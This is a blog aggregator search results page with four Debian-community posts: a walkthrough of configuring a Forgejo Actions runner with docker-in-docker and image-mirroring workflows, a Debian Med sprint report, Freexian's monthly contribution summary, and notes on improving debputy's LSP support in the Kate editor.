Search Results: "lowe"

17 March 2025

Sergio Talens-Oliag: Configuring forgejo actions

Last week I decided I wanted to try out forgejo actions to build this blog instead of using webhooks, so I looked the documentation and started playing with it until I had it working as I wanted. This post is to describe how I ve installed and configured a forgejo runner, how I ve added an oci organization to my instance to build, publish and mirror container images and added a couple of additional organizations (actions and docker for now) to mirror interesting actions. The changes made to build the site using actions will be documented on a separate post, as I ll be using this entry to test the new setup on the blog project.

Installing the runnerThe first thing I ve done is to install a runner on my server, I decided to use the OCI image installation method, as it seemed to be the easiest and fastest one. The commands I ve used to setup the runner are the following:
$ cd /srv
$ git clone https://forgejo.mixinet.net/blogops/forgejo-runner.git
$ cd forgejo-runner
$ sh ./bin/setup-runner.sh
The setup-runner.sh script does multiple things:
  • create a forgejo-runner user and group
  • create the necessary directories for the runner
  • create a .runner file with a predefined secret and the docker label
The setup-runner.sh code is available here. After running the script the runner has to be registered with the forgejo server, it can be done using the following command:
$ forgejo forgejo-cli actions register --name "$RUNNER_NAME" \
    --secret "$FORGEJO_SECRET"
The RUNNER_NAME variable is defined on the setup-runner.sh script and the FORGEJO_SECRET must match the value used on the .runner file.

Starting it with docker-composeTo launch the runner I m going to use a docker-compose.yml file that starts two containers, a docker in docker service to run the containers used by the workflow jobs and another one that runs the forgejo-runner itself. The initial version used a TCP port to communicate with the dockerd server from the runner, but when I tried to build images from a workflow I noticed that the containers launched by the runner were not going to be able to execute another dockerd inside the dind one and, even if they were, it was going to be expensive computationally. To avoid the issue I modified the dind service to use a unix socket on a shared volume that can be used by the runner service to communicate with the daemon and also re-shared with the job containers so the dockerd server can be used from them to build images.
Warning: The use of the same docker server that runs the jobs from them has security implications, but this instance is for a home server where I am the only user, so I am not worried about it and this way I can save some resources (in fact, I could use the host docker server directly instead of using a dind service, but just in case I want to run other containers on the host I prefer to keep the one used for the runner isolated from it). For those concerned about sharing the same server an alternative would be to launch a second dockerd only for the jobs (i.e. actions-dind) using the same approach (the volume with its socket will have to be shared with the runner service so it can be re-shared, but the runner does not need to use it).
The final docker-compose.yaml file is as follows:
services:
  dind:
    image: docker:dind
    container_name: 'dind'
    privileged: 'true'
    command: ['dockerd', '-H', 'unix:///dind/docker.sock', '-G', '$RUNNER_GID']
    restart: 'unless-stopped'
    volumes:
      - ./dind:/dind
  runner:
    image: 'data.forgejo.org/forgejo/runner:6.2.2'
    links:
      - dind
    depends_on:
      dind:
        condition: service_started
    container_name: 'runner'
    environment:
      DOCKER_HOST: 'unix:///dind/docker.sock'
    user: $RUNNER_UID:$RUNNER_GID
    volumes:
      - ./config.yaml:/config.yaml
      - ./data:/data
      - ./dind:/dind
    restart: 'unless-stopped'
    command: '/bin/sh -c "sleep 5; forgejo-runner daemon -c /config.yaml"'
There are multiple things to comment about this file:
  1. The dockerd server is started with the -H unix:///dind/docker.sock flag to use the unix socket to communicate with the daemon instead of using a TCP port (as said, it is faster and allows us to share the socket with the containers started by the runner).
  2. We are running the dockerd daemon with the RUNNER_GID group so the runner can communicate with it (the socket gets that group which is the same used by the runner).
  3. The runner container mounts three volumes: the data directory, the dind folder where docker creates the unix socket and a config.yaml file used by us to change the default runner configuration.
The config.yaml file was originally created using the forgejo-runner:
$ docker run --rm data.forgejo.org/forgejo/runner:6.2.2 \
    forgejo-runner generate-config > config.yaml
The changes to it are minimal, the runner capacity has been increased to 2 (that allows it to run two jobs at the same time) and the /dind/docker.sock value has been added to the valid_volumes key to allow the containers launched by the runner to mount it when needed; the diff against the default version is as follows:
@@ -13,7 +13,8 @@
   # Where to store the registration result.
   file: .runner
   # Execute how many tasks concurrently at the same time.
-  capacity: 1
+  # STO: Allow 2 concurrent tasks
+  capacity: 2
   # Extra environment variables to run jobs.
   envs:
     A_TEST_ENV_NAME_1: a_test_env_value_1
@@ -87,7 +88,9 @@
   # If you want to allow any volume, please use the following configuration:
   # valid_volumes:
   #   - '**'
-  valid_volumes: []
+  # STO: Allow to mount the /dind/docker.sock on the containers
+  valid_volumes:
+    - /dind/docker.sock
   # overrides the docker client host with the specified one.
   # If "-" or "", an available docker host will automatically be found.
   # If "automount", an available docker host will automatically be found and ...
To start the runner we export the RUNNER_UID and RUNNER_GID variables and call docker-compose up to start the containers on the background:
$ RUNNER_UID="$(id -u forgejo-runner)" RUNNER_GID="$(id -g forgejo-runner)" \
    docker compose up -d
If the server was configured right we are now able to start using actions with this runner.

Preparing the system to run things locallyTo avoid unnecessary network traffic we are going to create a multiple organizations in our forgejo instance to maintain our own actions and container images and mirror remote ones. The rationale behind the mirror use is that we reduce a lot the need to connect to remote servers to download the actions and images, which is good for performance and security reasons. In fact, we are going to build our own images for some things to install the tools we want without needing to do it over and over again on the workflow jobs.

Mirrored actionsThe actions we are mirroring are on the actions and docker organizations, we have created the following ones for now (the mirrors were created using the forgejo web interface and we have disabled manually all the forgejo modules except the code one for them):
To use our actions by default (i.e., without needing to add the server URL on the uses keyword) we have added the following section to the app.ini file of our forgejo server:
[actions]
ENABLED = true
DEFAULT_ACTIONS_URL = https://forgejo.mixinet.net

Setting up credentials to push imagesTo be able to push images to the oci organization I ve created a token with package:write permission for my own user because I m a member of the organization and I m authorized to publish packages on it (a different user could be created, but as I said this is for personal use, so there is no need to complicate things for now). To allow the use of those credentials on the actions I have added a secret (REGISTRY_PASS) and a variable (REGISTRY_USER) to the oci organization to allow the actions to use them. I ve also logged myself on my local docker client to be able to push images to the oci group by hand, as I it is needed for bootstrapping the system (as I m using local images on the worflows I need to push them to the server before running the ones that are used to build the images).

Local and mirrored imagesOur images will be stored on the packages section of a new organization called oci, inside it we have created two projects that use forgejo actions to keep things in shape:
  • images: contains the source files used to generate our own images and the actions to build, tag and push them to the oci organization group.
  • mirrors: contains a configuration file for the regsync tool to mirror containers and an action to run it.
On the next sections we are going to describe the actions and images we have created and mirrored from those projects.

The oci/images projectThe images project is a monorepo that contains the source files for the images we are going to build and a couple of actions. The image sources are on sub directories of the repository, to be considered an image the folder has to contain a Dockerfile that will be used to build the image. The repository has two workflows:
  • build-image-from-tag: Workflow to build, tag and push an image to the oci organization
  • multi-semantic-release: Workflow to create tags for the images using the multi-semantic-release tool.
As the workflows are already configured to use some of our images we pushed some of them from a checkout of the repository using the following commands:
registry="forgejo.mixinet.net/oci"
for img in alpine-mixinet node-mixinet multi-semantic-release; do
  docker build -t $registry/$img:1.0.0 $img
  docker tag $registry/$img:1.0.0 $registry/$img:latest
  docker push $registry/$img:1.0.0
  docker push $registry/$img:latest
done
On the next sub sections we will describe what the workflows do and will show their source code.

build-image-from-tag workflowThis workflow uses a docker client to build an image from a tag on the repository with the format image-name-v[0-9].[0-9].[0-9]+. As the runner is executed on a container (instead of using lxc) it seemed unreasonable to run another dind container from that one, that is why, after some tests, I decided to share the dind service server socket with the runner container and enabled the option to mount it also on the containers launched by the runner when needed (I only do it on the build-image-from-tag action for now). The action was configured to run using a trigger or when new tags with the right format were created, but when the tag is created by multi-semantic-release the trigger does not work for some reason, so now it only runs the job on triggers and checks if it is launched for a tag with the right format on the job itself. The source code of the action is as follows:
name: build-image-from-tag
on:
  workflow_dispatch:
jobs:
  build:
    # Don't build the image if the registry credentials are not set, the ref is not a tag or it doesn't contain '-v'
    if: $  vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != '' && startsWith(github.ref, 'refs/tags/') && contains(github.ref, '-v')  
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
      # Mount the dind socket on the container at the default location
      options: -v /dind/docker.sock:/var/run/docker.sock
    steps:
      - name: Extract image name and tag from git and get registry name from env
        id: job_data
        run:  
          echo "::set-output name=img_name::$ GITHUB_REF_NAME%%-v* "
          echo "::set-output name=img_tag::$ GITHUB_REF_NAME##*-v "
          echo "::set-output name=registry::$(
            echo "$  github.server_url  "   sed -e 's%https://%%'
          )"
          echo "::set-output name=oci_registry_prefix::$(
            echo "$  github.server_url  /oci"   sed -e 's%https://%%'
          )"
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Export build dir and Dockerfile
        id: build_data
        run:  
          img="$  steps.job_data.outputs.img_name  "
          build_dir="$(pwd)/$ img "
          dockerfile="$ build_dir /Dockerfile"
          if [ -f "$dockerfile" ]; then
            echo "::set-output name=build_dir::$build_dir"
            echo "::set-output name=dockerfile::$dockerfile"
          else
            echo "Couldn't find the Dockerfile for the '$img' image"
            exit 1
          fi
      - name: Login to the Container Registry
        uses: docker/login-action@v3
        with:
          registry: $  steps.job_data.outputs.registry  
          username: $  vars.REGISTRY_USER  
          password: $  secrets.REGISTRY_PASS  
      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v3
      - name: Build and Push
        uses: docker/build-push-action@v6
        with:
          push: true
          tags:  
            $  steps.job_data.outputs.oci_registry_prefix  /$  steps.job_data.outputs.img_name  :$  steps.job_data.outputs.img_tag  
            $  steps.job_data.outputs.oci_registry_prefix  /$  steps.job_data.outputs.img_name  :latest
          context: $  steps.build_data.outputs.build_dir  
          file: $  steps.build_data.outputs.dockerfile  
          build-args:  
            OCI_REGISTRY_PREFIX=$  steps.job_data.outputs.oci_registry_prefix  /
Some notes about this code:
  1. The if condition of the build job is not perfect, but it is good enough to avoid wrong uses as long as nobody uses manual tags with the wrong format and expects things to work (it checks if the REGISTRY_USER and REGISTRY_PASS variables are set, if the ref is a tag and if it contains the -v string).
  2. To be able to access the dind socket we mount it on the container using the options key on the container section of the job (this only works if supported by the runner configuration as explained before).
  3. We use the job_data step to get information about the image from the tag and the registry URL from the environment variables, it is executed first because all the information is available without checking out the repository.
  4. We use the job_data step to get the build dir and Dockerfile paths from the repository (right now we are assuming fixed paths and checking if the Dockerfile exists, but in the future we could use a configuration file to get them, if needed).
  5. As we are using a docker daemon that is already running there is no need to use the docker/setup-docker-action to install it.
  6. On the build and push step we pass the OCI_REGISTRY_PREFIX build argument to the Dockerfile to be able to use it on the FROM instruction (we are using it in our images).

multi-semantic-release workflowThis workflow is used to run the multi-semantic-release tool on pushes to the main branch. It is configured to create the configuration files on the fly (it prepares things to tag the folders that contain a Dockerfile using a couple of template files available on the repository s .forgejo directory) and run the multi-semantic-release tool to create tags and push them to the repository if new versions are to be built. Initially we assumed that the tag creation pushed by multi-semantic-release would be enough to run the build-tagged-image-task action, but as it didn t work we removed the rule to run the action on tag creation and added code to trigger the action using an api call for the newly created tags (we get them from the output of the multi-semantic-release execution). The source code of the action is as follows:
name: multi-semantic-release
on:
  push:
    branches:
      - 'main'
jobs:
  multi-semantic-release:
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/multi-semantic-release:latest
    steps:
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Generate multi-semantic-release configuration
        shell: sh
        run:  
          # Get the list of images to work with (the folders that have a Dockerfile)
          images="$(for img in */Dockerfile; do dirname "$img"; done)"
          # Generate a values.yaml file for the main packages.json file
          package_json_values_yaml=".package.json-values.yaml"
          echo "images:" >"$package_json_values_yaml"
          for img in $images; do
            echo " - $img" >>"$package_json_values_yaml"
          done
          echo "::group::Generated values.yaml for the project"
          cat "$package_json_values_yaml"
          echo "::endgroup::"
          # Generate the package.json file validating that is a good json file with jq
          tmpl -f "$package_json_values_yaml" ".forgejo/package.json.tmpl"   jq . > "package.json"
          echo "::group::Generated package.json for the project"
          cat "package.json"
          echo "::endgroup::"
          # Remove the temporary values file
          rm -f "$package_json_values_yaml"
          # Generate the package.json file for each image
          for img in $images; do
            tmpl -v "img_name=$img" -v "img_path=$img" ".forgejo/ws-package.json.tmpl"   jq . > "$img/package.json"
            echo "::group::Generated package.json for the '$img' image"
            cat "$img/package.json"
            echo "::endgroup::"
          done
      - name: Run multi-semantic-release
        shell: sh
        run:  
          multi-semantic-release   tee .multi-semantic-release.log
      - name: Trigger builds
        shell: sh
        run:  
          # Get the list of tags published on the previous steps
          tags="$(
            sed -n -e 's/^\[.*\] \[\(.*\)\] .* Published release \([0-9]\+\.[0-9]\+\.[0-9]\+\) on .*$/\1-v\2/p' \
              .multi-semantic-release.log
          )"
          rm -f .multi-semantic-release.log
          if [ "$tags" ]; then
            # Prepare the url for building the images
            workflow="build-image-from-tag.yaml"
            dispatch_url="$  github.api_url  /repos/$  github.repository  /actions/workflows/$workflow/dispatches"
            echo "$tags"   while read -r tag; do
              echo "Triggering build for tag '$tag'"
              curl \
                -H "Content-Type:application/json" \
                -H "Authorization: token $  secrets.GITHUB_TOKEN  " \
                -d " \"ref\":\"$tag\" " "$dispatch_url"
            done
          fi
Notes about this code:
  1. The use of the tmpl tool to process the multi-semantic-release configuration templates comes from previous uses, but on this case we could use a different approach (i.e. envsubst could be used) but we left it because it keeps things simple and can be useful in the future if we want to do more complex things with the template files.
  2. We use tee to show and dump to a file the output of the multi-semantic-release execution.
  3. We get the list of pushed tags using sed against the output of the multi-semantic-release execution and for each one found we use curl to call the forgejo API to trigger the build job; as the call is against the same project we can use the GITHUB_TOKEN generated for the workflow to do it, without creating a user token that has to be shared as a secret.
The .forgejo/package.json.tmpl file is the following one:
 
  "name": "multi-semantic-release",
  "version": "0.0.0-semantically-released",
  "private": true,
  "multi-release":  
    "tagFormat": "$ name -v$ version "
   ,
  "workspaces":   .images   toJson  
 
As can be seen it only needs a list of paths to the images as argument (the file we generate contains the names and paths, but it could be simplified). And the .forgejo/ws-package.json.tmpl file is the following one:
 
  "name": "  .img_name  ",
  "license": "UNLICENSED",
  "release":  
    "plugins": [
      [
        "@semantic-release/commit-analyzer",
         
          "preset": "conventionalcommits",
          "releaseRules": [
              "breaking": true, "release": "major"  ,
              "revert": true, "release": "patch"  ,
              "type": "feat", "release": "minor"  ,
              "type": "fix", "release": "patch"  ,
              "type": "perf", "release": "patch"  
          ]
         
      ],
      [
        "semantic-release-replace-plugin",
         
          "replacements": [
             
              "files": [ "  .img_path  /msr.yaml" ],
              "from": "^version:.*$",
              "to": "version: $ nextRelease.version ",
              "allowEmptyPaths": true
             
          ]
         
      ],
      [
        "@semantic-release/git",
         
          "assets": [ "msr.yaml" ],
          "message": "ci(release):   .img_name  -v$ nextRelease.version \n\n$ nextRelease.notes "
         
      ]
    ],
    "branches": [ "main" ]
   
 

The oci/mirrors projectThe repository contains a template for the configuration file we are going to use with regsync (regsync.envsubst.yml) to mirror images from remote registries using a workflow that generates a configuration file from the template and runs the tool. The initial version of the regsync.envsubst.yml file is prepared to mirror alpine containers from version 3.21 to 3.29 (we explicitly remove version 3.20) and needs the forgejo.mixinet.net/oci/node-mixinet:latest image to run (as explained before it was pushed manually to the server):
version: 1
creds:
  - registry: "$REGISTRY"
    user: "$REGISTRY_USER"
    pass: "$REGISTRY_PASS"
sync:
  - source: alpine
    target: $REGISTRY/oci/alpine
    type: repository
    tags:
      allow:
        - "latest"
        - "3\\.2\\d+"
        - "3\\.2\\d+.\\d+"
      deny:
        - "3\\.20"
        - "3\\.20.\\d+"

mirror workflowThe mirror workflow creates a configuration file replacing the value of the REGISTRY environment variable (computed by removing the protocol from the server_url), the REGISTRY_USER organization value and the REGISTRY_PASS secret using the envsubst command and running the regsync tool to mirror the images using the configuration file. The action is configured to run daily, on push events when the regsync.envsubst.yml file is modified on the main branch and can also be triggered manually. The source code of the action is as follows:
.forgejo/workflows/mirror.yaml
name: mirror
on:
  schedule:
    - cron: '@daily'
  push:
    branches:
      - main
    paths:
      - 'regsync.envsubst.yml'
  workflow_dispatch:
jobs:
  mirror:
    if: $  vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != ''  
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Sync images
        run:  
          REGISTRY="$(echo "$  github.server_url  "   sed -e 's%https://%%')" \
          REGISTRY_USER="$  vars.REGISTRY_USER  " \
          REGISTRY_PASS="$  secrets.REGISTRY_PASS  " \
            envsubst <regsync.envsubst.yml >.regsync.yml
          regsync --config .regsync.yml once
          rm -f .regsync.yml

ConclusionWe have installed a forgejo-runner and configured it to run actions for our own server and things are working fine. This approach allows us to have a powerful CI/CD system on a modest home server, something very useful for maintaining personal projects and playing with things without needing SaaS platforms like github or gitlab.

15 March 2025

Bits from Debian: Debian Med Sprint in Berlin

Debian Med sprint in Berlin on 15 and 16 February The Debian Med team works on software packages that are associated with medicine, pre-clinical research, and life sciences, and makes them available for the Debian distribution. Seven Debian developers and contributors to the team gathered for their annual Sprint, in Berlin, Germany on 15 and 16 February 2025. The purpose of the meeting was to tackle bugs in Debian-Med packages, enhance the quality of the team's packages, and coordinate the efforts of team members overall. This sprint allowed participants to fix dozens of bugs, including release-critical ones. New upstream versions were uploaded, and the participants took some time to modernize some packages. Additionally, they discussed the long-term goals of the team, prepared a forthcoming invited talk for a conference, and enjoyed working together. More details on the event and individual agendas/reports can be found at https://wiki.debian.org/Sprints/2025/DebianMed.

11 March 2025

Freexian Collaborators: Debian Contributions: Debian.Social administration, DebConf 25 preparations, Fixing Time-based test failure in Python requests package and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-02 Contributing to Debian is part of Freexian s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Debian.Social administration, by Stefano Rivera Over the last year, the Debian.social services outgrew the infrastructure that was supporting them. The matrix bridge in particular was hosted on a cloud instance backed by a large expensive storage volume. Debian.CH rented a new large physical server to host all these instances, earlier this year. Stefano set up Incus on the new physical machine and migrated all the old debian.social LXC Containers, libvirt VMs, and cloud instances into Incus-managed LXC containers. Stefano set up Prometheus monitoring and alerts for the new infrastructure and a Grafana dashboard. The current stack of debian.social services seem to comfortably fit on the new machine, with good room to grow.

DebConf 25, by Santiago Ruano Rinc n and Stefano Rivera DebConf 25 preparations continue. The team is currently finalizing a budget. Stefano helped to review the current budget proposals and suggest approaches for balancing it. Stefano installed a Zammad instance to organize queries from attendees, for the registration and visa teams. Santiago continued discussions with possible caterers so we can have options for the different diet requirements and that could fit into the DebConf budget. Also, in collaboration with Anupa, Santiago pushed the first draft changes to document the venue information in the DebConf 25 website and how to get to Brest.

Time-based test failure in requests, by Colin Watson Colin fixed a fun bug in the Python requests package. Santiago Vila has been running tests of what happens when Debian packages are built on a system in which time has been artificially set to somewhere around the end of the support period for the next Debian release, in order to make it easier to do things like issuing security updates for the lifetime of that release. In this case, the failure indicated an expired test certificate, and since the repository already helpfully included scripts to regenerate those certificates, it seemed natural to try regenerating them just before running tests. However, this failed for more obscure reasons and Colin spent some time investigating. This turned out to be because the test CA was missing the CA constraint and so recent versions of OpenSSL reject it; Colin sent a pull request to fix this.

Priority list for outdated packages, by Santiago Ruano Rinc n Santiago started a discussion on debian-devel about packages that have a history of security issues and that are outdated regarding new upstream releases. The goal of the mentioned effort is to have a prioritized list of packages needing some work, from a security point of view. Moreover, the aim of publicly sharing the list of packages with the Debian Developers community is to make it easier to look at the packages maintained by teams, or even other maintainers where help could be welcome. Santiago is planning to take into account the feedback provided in debian-devel and to propose a tooling that could help to regularly bring collective awareness of these packages.

Miscellaneous contributions
  • Carles worked on English to Catalan po-debconf translations: reviewed translations, created merge requests and followed up with developers for more than 30 packages using po-debconf-manager.
  • Carles helped users, fixed bugs and implemented downloading updated templates on po-debconf-manager.
  • Carles packaged a new upstream version of python-pyaarlo.
  • Carles improved reproducibility of qnetload (now reported as reproducible) and simplemonitor (followed up with upstream and pending update of Debian package).
  • Carles collaborated with debian-history package: fixed FTBFS from master branch, enabled salsa-ci and investigated reproducibility.
  • Emilio improved support for automatically marking CVEs as NOT-FOR-US in the security-tracker, closing #1073012.
  • Emilio updated xorg-server and xwayland in unstable, fixing the last round of security vulnerabilities.
  • Stefano prepared a few PyPy and cPython uploads, and started the python3.13-only transition.
  • Helmut Grohne sent patches for 24 cross build failures.
  • Helmut fixed two problems in the Debian /usr-merge analysis tool. In one instance, it would overmatch Debian bugs to issues and in another it would fail to recognize Pre-Depends as a conflict mechanism.
  • Helmut attempted making rebootstrap work for gcc-15 with limited success as very many packages FTBFS with gcc-15 due to using function declarations without arguments.
  • Helmut provided a change to the security-tracker that would pre-compute /data/json during database updates rather than on demand resulting in a reduced response time.
  • Colin uploaded OpenSSH security updates for testing/unstable, bookworm, bullseye, buster, and stretch.
  • Colin fixed upstream monitoring for 26 Python packages, and upgraded 54 packages (mostly Python-related, but also PuTTY) to new upstream versions.
  • Colin updated python-django in bookworm-backports to 4.2.18 (issuing BSA-121), and added new backports of python-django-dynamic-fixture and python-django-pgtrigger, all of which are dependencies of debusine.
  • Thorsten Alteholz finally managed to upload hplip to fix two release critical and some normal bugs. The next step in March would be to upload the latest version of hplip.
  • Faidon updated crun in unstable & trixie, resolving a long-standing request of enabling criu support and thus enabling podman with checkpoint/restore functionality (With gratitude to Salvatore Bonaccorso and Reinhard Tartler for the cooperation and collaboration).
  • Faidon uploaded a number of packages (librdkafka, libmaxminddb, python-maxminddb, lowdown, tox, tox-uv, pyproject-api, xiccd and gdnsd) bringing them up to date with new upstream releases, resolving various bugs.
  • Lucas Kanashiro uploaded some ruby packages involved in the Rails 7 transition with new upstream releases.
  • Lucas triaged a ruby3.1 bug (#1092595)) and prepared a fix for the next stable release update.
  • Lucas set up the needed wiki pages and updated the Debian Project status in the Outreachy portal, in order to send out a call for projects and mentors for the next round of Outreachy.
  • Anupa joined Santiago to prepare a list of companies to contact via LinkedIn for DebConf 25 sponsorship.
  • Anupa printed Debian stickers and sponsorship brochures, flyers for DebConf 25 to be distributed at FOSS ASIA summit 2025.
  • Anupa participated in the Debian publicity team meeting and discussed the upcoming events and tasks.
  • Rapha l packaged zim 0.76.1 and integrated an upstream patch for another regression that he reported.
  • Rapha l worked with the Debian System Administrators for tracker.debian.org to better cope with gmail s requirement for mails to be authenticated.

9 March 2025

Niels Thykier: Improving Debian packaging in Kate

The other day, I noted that the emacs integration with debputy stopped working. After debugging for a while, I realized that emacs no longer sent the didOpen notification that is expected of it, which confused debputy. At this point, I was already several hours into the debugging and I noted there was some discussions on debian-devel about emacs and byte compilation not working. So I figured I would shelve the emacs problem for now. But I needed an LSP capable editor and with my vi skills leaving much to be desired, I skipped out on vim-youcompleteme. Instead, I pulled out kate, which I had not been using for years. It had LSP support, so it would fine, right? Well, no. Turns out that debputy LSP support had some assumptions that worked for emacs but not kate. Plus once you start down the rabbit hole, you stumble on things you missed previously.
Getting started First order of business was to tell kate about debputy. Conveniently, kate has a configuration tab for adding language servers in a JSON format right next to the tab where you can see its configuration for built-in LSP (also in JSON format9. So a quick bit of copy-paste magic and that was done. Yesterday, I opened an MR against upstream to have the configuration added (https://invent.kde.org/utilities/kate/-/merge_requests/1748) and they already merged it. Today, I then filed a wishlist against kate in Debian to have the Debian maintainers cherry-pick it, so it works out of the box for Trixie (https://bugs.debian.org/1099876). So far so good.
Inlay hint woes Since July (2024), debputy has support for Inlay hints. They are basically small bits of text that the LSP server can ask the editor to inject into the text to provide hints to the reader. Typically, you see them used to provide typing hints, where the editor or the underlying LSP server has figured out the type of a variable or expression that you did not explicitly type. Another common use case is to inject the parameter name for positional arguments when calling a function, so the user do not have to count the position to figure out which value is passed as which parameter. In debputy, I have been using the Inlay hints to show inherited fields in debian/control. As an example, if you have a definition like:
Source: foo-src
Section: devel
Priority: optional
Package: foo-bin
Architecture: any
Then foo-bin inherits the Section and Priority field since it does not supply its own. Previously, debputy would that by injecting the fields themselves and their value just below the Package field as if you had typed them out directly. The editor always renders Inlay hints distinctly from regular text, so there was no risk of confusion and it made the text look like a valid debian/control file end to end. The result looked something like:
Source: foo-src
Section: devel
Priority: optional
Package: foo-bin
Section: devel
Priority: optional
Architecture: any
With the second instances of Section and Priority being rendered differently than its surrendering (usually faded or colorlessly). Unfortunately, kate did not like injecting Inlay hints with a newline in them, which was needed for this trick. Reading into the LSP specs, it says nothing about multi-line Inlay hints being a thing and I figured I would see this problem again with other editors if I left it be. I ended up changing the Inlay hints to be placed at the end of the Package field and then included surrounding () for better visuals. So now, it looks like:
Source: foo-src
Section: devel
Priority: optional
Package: foo-bin  (Section: devel)  (Priority: optional)
Architecture: any
Unfortunately, it is no longer 1:1 with the underlying syntax which I liked about the previous one. But it works in more editors and is still explicit. I also removed the Inlay hint for the Homepage field. It takes too much space and I have yet to meet someone missing it in the binary stanza. If you have any better ideas for how to render it, feel free to reach out to me.
Spurious completion and hover As I was debugging the Inlay hints, I wanted to do a quick restart of debputy after each fix. Then I would trigger a small change to the document to ensure kate would request an update from debputy to render the Inlay hints with the new code. The full outgoing payloads are sent via the logs to the client, so it was really about minimizing which LSP requests are sent to debputy. Notably, two cases would flood the log:
  • Completion requests. These are triggered by typing anything at all and since I wanted to a change, I could not avoid this. So here it was about making sure there would be nothing to complete, so the result was a small as possible.
  • Hover doc requests. These are triggered by mouse hovering over field, so this was mostly about ensuring my mouse movement did not linger over any field on the way between restarting the LSP server and scrolling the log in kate.
In my infinite wisdom, I chose to make a comment line where I would do the change. I figured it would neuter the completion requests completely and it should not matter if my cursor landed on the comment as there would be no hover docs for comments either. Unfortunately for me, debputy would ignore the fact that it was on a comment line. Instead, it would find the next field after the comment line and try to complete based on that. Normally you do not see this, because the editor correctly identifies that none of the completion suggestions start with a \#, so they are all discarded. But it was pretty annoying for the debugging, so now debputy has been told to explicitly stop these requests early on comment lines.
Hover docs for packages I added a feature in debputy where you can hover over package names in your relationship fields (such as Depends) and debputy will render a small snippet about it based on data from your local APT cache. This doc is then handed to the editor and tagged as markdown provided the editor supports markdown rendering. Both emacs and kate support markdown. However, not all markdown renderings are equal. Notably, emacs's rendering does not reformat the text into paragraphs. In a sense, emacs rendering works a bit like <pre>...</pre> except it does a bit of fancy rendering inside the <pre>...</pre>. On the other hand, kate seems to convert the markdown to HTML and then throw the result into an HTML render engine. Here it is important to remember that not all newlines are equal in markdown. A Foo<newline>Bar is treated as one "paragraph" (<p>...</p>) and the HTML render happily renders this as single line Foo Bar provided there is sufficient width to do so. A couple of extra newlines made wonders for the kate rendering, but I have a feeling this is not going to be the last time the hover docs will need some tweaking for prettification. Feel free to reach out if you spot a weirdly rendered hover doc somewhere.
Making quickfixes available in kate Quickfixes are treated as generic code actions in the LSP specs. Each code action has a "type" (kind in the LSP lingo), which enables the editor to group the actions accordingly or filter by certain types of code actions. The design in the specs leads to the following flow:
  1. The LSP server provides the editor with diagnostics (there are multiple ways to trigger this, so we will keep this part simple).
  2. The editor renders them to the user and the user chooses to interact with one of them.
  3. The interaction makes the editor asks the LSP server, which code actions are available at that location (optionally with filter to only see quickfixes).
  4. The LSP server looks at the provided range and is expected to return the relevant quickfixes here.
This flow is really annoying from a LSP server writer point of view. When you do the diagnostics (in step 1), you tend to already know what the possible quickfixes would be. The LSP spec authors realized this at some point, so there are two features the editor provides to simplify this.
  1. In the editor request for code actions, the editor is expected to provide the diagnostics that they received from the server. Side note: I cannot quite tell if this is optional or required from the spec.
  2. The editor can provide support for remembering a data member in each diagnostic. The server can then store arbitrary information in that member, which they will see again in the code actions request. Again, provided that the editor supports this optional feature.
All the quickfix logic in debputy so far has hinged on both of these two features. As life would have it, kate provides neither of them. Which meant I had to teach debputy to keep track of its diagnostics on its own. The plus side is that makes it easier to support "pull diagnostics" down the line, since it requires a similar feature. Additionally, it also means that quickfixes are now available in more editors. For consistency, debputy logic is now always used rather than relying on the editor support when present. The downside is that I had to spend hours coming up with and debugging a way to find the diagnostics that overlap with the range provided by the editor. The most difficult part was keeping the logic straight and getting the runes correct for it.
Making the quickfixes actually work With all of that, kate would show the quickfixes for diagnostics from debputy and you could use them too. However, they would always apply twice with suboptimal outcome as a result. The LSP spec has multiple ways of defining what need to be changed in response to activating a code action. In debputy, all edits are currently done via the WorkspaceEdit type. It has two ways of defining the changes. Either via changes or documentChanges with documentChanges being the preferred one if both parties support this. I originally read that as I was allowed to provide both and the editor would pick the one it preferred. However, after seeing kate blindly use both when they are present, I reviewed the spec and it does say "The edit should either provide changes or documentChanges", so I think that one is on me. None of the changes in debputy currently require documentChanges, so I went with just using changes for now despite it not being preferred. I cannot figure out the logic of whether an editor supports documentChanges. As I read the notes for this part of the spec, my understanding is that kate does not announce its support for documentChanges but it clearly uses them when present. Therefore, I decided to keep it simple for now until I have time to dig deeper.
Remaining limitations with kate There is one remaining limitation with kate that I have not yet solved. The kate program uses KSyntaxHighlighting for its language detection, which in turn is the basis for which LSP server is assigned to a given document. This engine does not seem to support as complex detection logic as I hoped from it. Concretely, it either works on matching on an extension / a basename (same field for both cases) or mime type. This combined with our habit in Debian to use extension less files like debian/control vs. debian/tests/control or debian/rules or debian/upstream/metadata makes things awkward a best. Concretely, the syntax engine cannot tell debian/control from debian/tests/control as they use the same basename. Fortunately, the syntax is close enough to work for both and debputy is set to use filename based lookups, so this case works well enough. However, for debian/rules and debian/upstream/metadata, my understanding is that if I assign these in the syntax engine as Debian files, these rules will also trigger for any file named foo.rules or bar.metadata. That seems a bit too broad for me, so I have opted out of that for now. The down side is that these files will not work out of the box with kate for now. The current LSP configuration in kate does not recognize makefiles or YAML either. Ideally, we would assign custom languages for the affected Debian files, so we do not steal the ID from other language servers. Notably, kate has a built-in language server for YAML and debputy does nothing for a generic YAML document. However, adding YAML as a supported language for debputy would cause conflict and regressions for users that are already happy with their generic YAML language server from kate. So there are certainly still work to be done. If you are good with KSyntaxHighlighting and know how to solve some of this, I hope you will help me out.
Changes unrelated to kate While I was working on debputy, I also added some other features that I want to mention.
  1. The debputy lint command will now show related context to diagnostic in its terminal report when such information is available and is from the same file as the diagnostic itself (cross file cases are rendered without related information). The related information is typically used to highlight a source of a conflict. As an example, if you use the same field twice in a stanza of debian/control, then debputy will add a diagnostic to the second occurrence. The related information for that diagnostic would provide the position of the first occurrence. This should make it easier to find the source of the conflict in the cases where debputy provides it. Let me know if you are missing it for certain diagnostics.

